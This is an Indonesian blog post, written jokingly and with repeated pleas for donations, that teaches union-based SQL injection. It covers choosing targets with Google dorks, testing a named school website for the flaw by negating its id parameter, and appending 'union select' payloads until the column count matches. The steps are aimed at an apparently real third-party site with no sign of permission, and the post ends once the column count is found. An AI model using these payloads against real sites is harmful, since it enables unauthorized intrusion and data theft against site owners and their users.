Wednesday, June 3, 2009

tutorial SQL 1
Wellcome friend…
Ini pertama kalinya saya mencoba untuk menulis dalam sebuah blog,jadi kalo masih banyak kekurangan jangan gebugin saya..tapi kalo ada kelebihan, silahkan donate ke rekening saya…:P

Pertama saya akan mencoba menjelaskan tentang SQL injection,tapi cuma dikit aja maslahnya belum ada yg donate sich…J
Kalo master² mau nambahin silahkan….
Kalo temen² mau kasih comment, boleh aja tapi donate dulu…xixixiixxi

Ok,langsung aja degh…

1. About Sql Injection
Sql Injection merupakan trik untuk menyuntikan air uang(translated)..hihihi salah.maksudnya menyuntikan Permintaan SQL / perintah sebagai masukan yg memungkin melalui halaman web ataupun melalui url.
Singkat kan??makanya donate,biar saya punya cukup uang buat makan dan cukup tenaga buat ngetik…xixixixi. Ujung²nya suruh donate juga…J

2. Apa yg di butuhkan?
3 Kg tepung imajinasi, 1,5 Kg kreatifitas, 800 gram logika, 400 gram kesabaran.
Dan yg paling penting harus ada koneksi internet dan web browser apapun. Dan jangan lupa juga 2 bungkus mallboro mix dan 1 botol bir.J

3. Apa yg harus kita cari??
Pertama kita cari warnet yg murah dulu ( bagi yg blom punya laptop,like me ),,trus cari tempat yg nyaman,ga terlalu dingin dan ga terlalu panas,,trus bubu aja disitu..hehehe..bcandanya maksa,,ga lucu geto loch…
Harap maklum..lagi kelaperan nih…

Udah mulai serius nih,udah adzan subuh..xixixi ga ada hubungannya..

Kita cari target di google dengan dork apa aja sesuka hati.
Missal: site:com cilacap
Artinya kita mencari web .com dan yg mengandung kata cilacap.
Missal kita dapet http://sman1clp.com
Kita cari id nya http://sman1clp.com/index.php?cat=berita&idberita=50
Selanjutnya kita cek web tersebut vulner atau gak..
Caranya kita kasih tanda – di depan angka id nya.
Jadi http://sman1clp.com/index.php?cat=berita&idberita=-50
Apa yg terjadi??blank…
Yup, jika kita masukan – didepan angka id dan web menjadi blank atau keluar pesan eror,itu artinya web tersebut vulner.

Selanjutnya kita cari binery nya. Caranya dengan perintah union select.
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1--
tanda + adalah string Sql yg berarti spasi.sama saja dengan %20. dan -– juga bisa diganti dengan /* untuk lebih jelasnya tentan g-string² SQL, Tanya mbah google.
Ok,kembali ke tanktop..
Setelah kita masukin union select, apa yg terjadi??
The used SELECT statements have a different number of columns
Kita tambahkan binerynya
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2--
ternyata masih The used SELECT statements have a different number of columns
tambahkan lagi sampe true dan ga kluar lagi pesan tsb.
Ok, kita dapet
http://sman1clp.com/index.php?cat=berita&idberita=-50+union+select+1,2,3,4,5,6,7--
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)